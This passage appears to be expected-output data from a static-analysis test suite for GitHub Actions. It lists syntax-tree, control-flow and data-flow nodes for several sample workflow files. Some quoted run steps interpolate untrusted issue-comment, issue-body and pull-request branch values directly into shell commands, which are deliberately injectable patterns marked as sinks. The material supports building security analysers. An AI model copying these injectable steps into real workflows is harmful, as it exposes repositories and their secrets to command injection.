.github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| 
.github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | 
.github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:13:24:13:24 | 0 | 
.github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | 
Job: job1 | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| 
.github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | 
on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| 
.github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +cfgNodes +| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ 
github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:1:1:33:14 | enter on: | +| .github/workflows/multiline.yml:1:1:33:14 | exit on: | +| .github/workflows/multiline.yml:1:1:33:14 | exit on: (normal) | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step 
| +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:1:1:40:53 | enter on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | 
+dfNodes +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ 
github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ 
steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +argumentNodes +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +usesIds +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | +nodeLocations +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | 
+| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | .github/workflows/expression_nodes.yml@13:14:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:16:14:19:57 | 
LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:9:5:33:14 | .github/workflows/multiline.yml@9:5:33:14 | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:9:15:6 | .github/workflows/multiline.yml@11:9:15:6 | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e 
